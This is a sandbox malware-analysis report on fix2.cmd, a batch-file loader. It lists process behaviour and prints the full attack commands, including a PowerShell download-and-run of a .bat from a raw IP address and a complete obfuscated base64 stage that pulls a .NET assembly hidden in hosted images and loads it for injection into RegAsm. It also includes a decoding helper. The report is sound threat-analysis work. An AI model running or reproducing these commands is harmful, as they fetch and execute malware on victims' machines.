File name: fix2.cmd
Full analysis: https://app.any.run/tasks/b7fda0f0-cd80-40dc-9ad7-ed11fb5bc499
Verdict: Malicious activity
Threats: Loader

A loader is malicious software that infiltrates devices to deliver further malicious payloads. It profiles the victim's system and then installs other threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links, relying on social engineering to trick users into downloading and running them. Loaders employ evasion and persistence tactics to avoid detection.

Analysis date: September 03, 2025, 16:10:34
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: loader, reverseloader, ta558, apt, payload, stegocampaign, susp-powershell
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5: 161BECAD962E2351D74D9921EDE038FC
SHA1: 7726CCD45126A9F0BE73CA5EEB33254A66161B3E
SHA256: 8A9C83CA24AD90813444EC6972D9590E621D2FF40D1FA88350BD615782226E88
SSDEEP: 24:0sTDggIOggIOt6WB3wQC5glm3wQ9F5gl4enGSb9+G5BavFkhtyPR7zErrCBVYJOz:JD8LjWB9Calm9Xal4qGSp1kKHyPRvh7v

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 4768)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 6808)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 4312)
      • powershell.exe (PID: 6812)
      • powershell.exe (PID: 2028)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
  • SUSPICIOUS

    • Starts process via Powershell

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 6812)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)
    • Found IP address in command line

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)
    • Executing commands from a ".bat" file

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 504)
      • cmd.exe (PID: 6796)
      • powershell.exe (PID: 6812)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 1604)
      • powershell.exe (PID: 6664)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 6836)
      • cmd.exe (PID: 6356)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 5968)
      • cmd.exe (PID: 6796)
      • powershell.exe (PID: 6812)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 3620)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 504)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 6812)
      • cmd.exe (PID: 6796)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 6812)
      • cmd.exe (PID: 6796)
    • Application launched itself

      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 6812)
      • powershell.exe (PID: 3620)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 4768)
      • powershell.exe (PID: 6808)
      • powershell.exe (PID: 4312)
      • powershell.exe (PID: 2028)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 1604)
      • cmd.exe (PID: 6356)
    • Removes files via Powershell

      • powershell.exe (PID: 3396)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3620)
    • Checks proxy server information

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3620)
      • slui.exe (PID: 1324)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Creates files in the program directory

      • powershell.exe (PID: 4768)
      • powershell.exe (PID: 6808)
    • Returns hidden items found within a container (POWERSHELL)

      • powershell.exe (PID: 4768)
      • conhost.exe (PID: 7008)
      • conhost.exe (PID: 4012)
      • powershell.exe (PID: 6808)
      • conhost.exe (PID: 1324)
      • powershell.exe (PID: 5368)
      • conhost.exe (PID: 2432)
      • conhost.exe (PID: 1508)
      • conhost.exe (PID: 5876)
      • powershell.exe (PID: 4312)
      • conhost.exe (PID: 1488)
      • conhost.exe (PID: 5548)
      • conhost.exe (PID: 7060)
      • powershell.exe (PID: 2028)
      • conhost.exe (PID: 1644)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 3836)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Manual execution by a user

      • cmd.exe (PID: 6356)
    • Reads the software policy settings

      • slui.exe (PID: 1324)
    • Returns all items recursively from all subfolders (POWERSHELL)

      • powershell.exe (PID: 3396)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 191
Monitored processes: 58
Malicious processes: 18
Suspicious processes: 0

Behavior graph

The interactive graph in the full report starts at cmd.exe and conhost.exe launching powershell.exe; from there the chain alternates between powershell.exe instances spawning further powershell.exe instances, cmd.exe wrappers and timeout.exe delays, with a single slui.exe node. Nodes the graph labels "no specs" carried no indicator hits.

Process information (per process: PID and command line, image path, parent process, attributes, loaded images)

PID 304: timeout /t 5
Path: C:\Windows\System32\timeout.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: timeout - pauses command processing
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
504powershell -Command "Start-Process powershell -WindowStyle Hidden -ArgumentList '-Command \"$sofigo = ''IAAgACAAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAd@gBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAd@gBvAHQAbwBjAG8AbABUAHkAd@ABlAF0AOgA6AFQAbABzADEAMgAKACAAIAAgACAAIAAgACAAIABmAHUAbgBjAHQAaQBvAG4AIABEAG8AdwBuAGwAbwBhAGQARABhAHQAYQBGAHIAbwBtAEwAaQBuAGsAd@wAgAHsAIABwAGEAd@gBhAG0AIAAoAFsAd@wB0AHIAaQBuAGd@AWwBdAF0AJABsAGkAbgBrAHMAKQAgAAoAIAAgACAAIAAgACAAIAAgACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHd@ALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACAACgAgACAAIAAgACAAIAAgACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACAAPQAgAEd@AZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAbABpAG4AawBzACAALQBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAd@wAuAEwAZQBuAGd@AdABoADsAIAAKACAAIAAgACAAIAAgACAAIABmAG8Ad@gBlAGEAYwBoACAAKAAkAGwAaQBuAGsAIABpAG4AIAAkAHMAaAB1AGYAZgBsAGUAZABMAGkAbgBrAHMAKQAgAHsAIAB0AHIAeQAgAHsAIAByAGUAdAB1AHIAbgAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABjAG8AbgB0AGkAbgB1AGUAIAB9ACAAfQA7ACAACgAgACAAIAAgACAAIAAgACAAd@gBlAHQAdQByAG4AIAAkAG4AdQBsAGwAIAB9ADsAIAAKACAAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAd@wAgAD0AIAAnAGgAdAB0ACd@AOwAKACAAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAd@wAyACAAPQAgACd@Ad@ABzADoALwAvACd@AOwAKACAAIAAgACAAIAAgACAAIAAkAGwAZgBzAGQAZgBzAGQAZwAgAD0AIAAgACQAQgB5AHQAZQBzACAAKwAkAEIAeQB0AGUAd@wAyADsACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBrAHMAIAA9ACAAQAAoACgAJABsAGYAd@wBkAGYAd@wBkAGd@AIAArACAAJwBpAC4AaQBiAGIALgBjAG8ALwA3AGQAYgBHAEsAdwBYAFoALwBpAG0AYQBnAGUALgBqAHAAZwA/ADEAMgA3ADEAMQAzADQAMwAnACkALAAgACgAJABsAGYAd@wBkAGYAd@wBkAGd@AIAArACAAJwBiAGkAdABiAHUAYwBrAGUAdAAuAG8Ad@gBnAC8AaABnAGYAZABmAHMAZgAvAGoAawByADQALwByAGEAdwAvADYAZABkAGUAMAAwADAAMAA4ADkAMAA1ADgAMwAyADAANQA5AGIAYQAzAGQAOAA2AGYAOQBhAGIAOQAzADIANwA3ADEAMwBhADQAZAA5ADUALwBpAG0AYQBnAGUALgBqAHAAZwA/ADEAMgA3ADEAMQAzADQAMwAnACkAKQA7AAoAIAAgACAAIAAgACAAIA
AgACAAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAEQAbwB3AG4AbABvAGEAZABEAGEAdABhAEYAd@gBvAG0ATABpAG4AawBzACAAJABsAGkAbgBrAHMAOwAKACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGd@AZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAd@gBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAd@wApADsACgAgACAAIAAgACAAIAAgACAAIAAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACd@APAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAIAAkAGUAbgBkAEYAbABhAGd@AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAIAAKACAAIAAgACAAIAAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsACgAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAd@wB0AGEAd@gB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAIAB7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGd@AdABoADsAIAAKACAAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGd@AdABoAGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsACgAgACAAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGd@AdABoAGgAKQA7AAoAIAAgACAAIAAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsACgAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAd@gB0AF0AOgA6AEYAd@gBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGd@AKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACAAIAAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4ASQBuAGQAZ
QB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsACgAgACAAIAAgACAAIAAgACAAJABsAG8AYQBkAGUAZABBAHMAd@wBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAd@wB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAd@wBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AAoAIAAgACAAIAAgACAAIAAgADEALgAuADIAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAFMAdABhAHIAdAAtAFMAbABlAGUAd@AAgADEAIAB9ACAAPgAgACQAbgB1AGwAbAAKACAAIAAgACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAd@wBlAG0AYgBsAHkALgBHAGUAdABUAHkAd@ABlACgAJwB0AGUAd@wB0AHAAbwB3AGUAd@gBzAGgAZQBsAGwALgBIAG8AYQBhAGEAYQBhAGEAd@wBkAG0AZQAnACkAOwAKACAAIAAgACAAIAAgACAAMQAuAC4AMgAgAHwAIABGAG8Ad@gBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAUwB0AGEAd@gB0AC0AUwBsAGUAZQBwACAAMQAgAH0AIAA+ACAAJABuAHUAbABsAAoAIAAgACAAIAAgACAAIAAgACQAaQBuAGoAZQBjACAAPQAgACd@AUgBlAGd@AQQBzAG0AJwA7AAoAIAAgACAAIAAgACAAIAAgACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAd@ABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAGwAZgBzAGd@AZQBkAGQAZABkAGQAZABkAGEAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACd@AdAB4AHQALgA4ADUAMgA3AF8AOAA4ADQANgA4ADQANgA1ADd@AMQBfAGQAYQBvAGwAeQBhAHAALwBuAGkAYQBtAC8AdwBhAHIALwB0AG8AbABwAGUAd@gAvAHQAeQB0AGkAdQBpAGIAbgAvAGd@Ad@gBvAC4AdABlAGsAYwB1AGIAdABpAGIALwAvADoAd@wAnACwAIAAnADEAJwAsACAAJwBXAGkAbgBkAG8AdwBzAFUAd@ABkAGEAdABlACd@ALAAgACQAaQBuAGoAZQBjACwAIAAnADAAJwAgACwAIAAnAHgAOAA2ACd@AKQApAH0AfQA7AAoA'';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($sofigo.replace(''d@'',''c'')));iex $OWjuxD\"'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
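The PID 504 entry above is the decoding stage of the chain. cmd.exe runs powershell.exe, which uses Start-Process -WindowStyle Hidden to relaunch PowerShell invisibly with the $sofigo blob as its only payload. The blob is base64 over UTF-16LE text in which every 'c' of the base64 output was swapped for 'd@'; the wrapper undoes that with .replace('d@','c'), calls [Convert]::FromBase64String, converts the bytes with [Text.Encoding]::Unicode.GetString and passes the text to iex. Extraction has wrapped the blob over three lines in this report; it is a single command line. Decoded, the script forces TLS 1.2, defines DownloadDataFromLinks (shuffles its URL list with Get-Random and returns the first body WebClient.DownloadData can fetch) and feeds it two URLs: https://i.ibb.co/7dbGKwXZ/image.jpg?12711343, which appears in the HTTP list below, and https://bitbucket.org/hgfdfsf/jkr4/raw/6dde00008905832059ba3d86f9ab9327713a4d95/image.jpg?12711343, which exists only inside the blob. The downloaded image is read as UTF-8 text, the substring between <<BASE64_START>> and <<BASE64_END>> is base64-decoded into a .NET assembly loaded in memory with [System.Reflection.Assembly]::Load, and after two one-second sleeps the method lfsgeddddddda of type testpowershell.Hoaaaaaasdme is invoked with ('txt.8527_8846846571_daolyap/niam/war/tolper/tytiuibn/gro.tekcubtib//:s', '1', 'WindowsUpdate', 'RegAsm', '0', 'x86'). The first argument is the next stage written backwards; reversed it reads s://bitbucket.org/nbiuityt/replot/raw/main/payload_1756486488_7258.txt, and the HTTP list shows the sandbox requesting exactly that path over https and receiving a 404, so the loaded assembly supplies the scheme prefix (the assembly itself is not captured in this report). The fourth argument is held in a variable named $injec, which together with 'x86' reads as the injection target, RegAsm.exe; no RegAsm.exe child appears in the process list, consistent with the failed next-stage download.

The Python below is an added analyst helper, not ANY.RUN tooling or anything taken from the sample, that reproduces the three transformations so they can be run offline: the wrapper's decode chain, the marker extraction from a carrier image, and the argument reversal. The only data copied from the report is the opening segment of the $sofigo blob; the carrier image used for the extraction check is constructed in the block and stands in for the real 2.29 Mb image.jpg.

```python
import base64
from typing import Optional

# Opening segment of the $sofigo blob, copied from the PID 504 command line in this report.
# It decodes to the script's first statement; the full blob decodes the same way.
SOFIGO_PREFIX = (
    "IAAgACAAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoA"
    "UwBlAGMAdQByAGkAdAB5AFAAd@gBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkA"
    "dAB5AFAAd@gBvAHQAbwBjAG8AbABUAHkAd@ABlAF0AOgA6AFQAbABzADEAMgAKACAA"
)


def deobfuscate_cmdline(blob: str) -> str:
    """Reverse the wrapper's chain: .replace('d@','c') -> FromBase64String -> Unicode.GetString."""
    fixed = blob.replace("d@", "c")
    fixed += "=" * (-len(fixed) % 4)  # tolerate a blob copied without its padding
    return base64.b64decode(fixed).decode("utf-16-le")


START_MARK = b"<<BASE64_START>>"
END_MARK = b"<<BASE64_END>>"


def extract_marked_payload(image: bytes) -> Optional[bytes]:
    """Cut the base64 text appended after the JPEG data, between the two markers, and decode it.
    Mirrors the IndexOf / Substring / FromBase64String steps of the decoded script."""
    start = image.find(START_MARK)
    if start < 0:
        return None
    start += len(START_MARK)
    end = image.find(END_MARK, start)
    if end < 0:
        return None
    return base64.b64decode(image[start:end].strip())


def reverse_argument(s: str) -> str:
    """The next-stage URL is handed to the loaded assembly written backwards."""
    return s[::-1]


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check on an extracted payload: PE files start with the 'MZ' DOS header."""
    return len(data) >= 2 and data[:2] == b"MZ"


# Constructed stand-in for image.jpg: a minimal JPEG envelope followed by the marker-wrapped
# base64 of a fake payload. This is NOT the real carrier from the report.
FAKE_PAYLOAD = b"MZ\x90\x00" + b"constructed-dotnet-assembly"
FAKE_IMAGE = (
    b"\xff\xd8\xff\xe0" + b"\x00" * 32 + b"\xff\xd9"
    + START_MARK + base64.b64encode(FAKE_PAYLOAD) + END_MARK
)

# First Invoke() argument, as decoded from the blob in this report.
REVERSED_ARG = "txt.8527_8846846571_daolyap/niam/war/tolper/tytiuibn/gro.tekcubtib//:s"

if __name__ == "__main__":
    print(deobfuscate_cmdline(SOFIGO_PREFIX).strip())
    payload = extract_marked_payload(FAKE_IMAGE)
    print(len(payload), looks_like_pe(payload))
    print(reverse_argument(REVERSED_ARG))
```

Feed deobfuscate_cmdline the complete blob copied from the raw command line (not from a wrapped display) to obtain the whole script; a single dropped or extra character shifts the base64 alignment and turns the UTF-16 output into noise from that point on. extract_marked_payload works on the real carrier unchanged, since the loader only scans for the two markers and never parses the JPEG structure itself.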
PID 1100: powershell -Command "Write-Host '20 critical errors found...' -ForegroundColor Red"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID 1180: powershell -Command "Write-Host 'Troubleshoot started...' -ForegroundColor Green"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID 1244: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\WindowsUpdate1.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID 1324: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 1324: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
(The PID was reused after the conhost.exe instance above exited. slui.exe started by svchost.exe with -Embedding is COM-activated Windows activation activity, not something the batch launched.)
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID 1336: powershell -Command "Invoke-WebRequest -Uri 'http://206.82.9.203/WindowsUpdate.bat' -OutFile 'C:\Users\admin\WindowsUpdate1.bat' -UseBasicParsing; Start-Process -FilePath 'C:\Users\admin\WindowsUpdate1.bat' -Wait"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 1488: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 1508: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
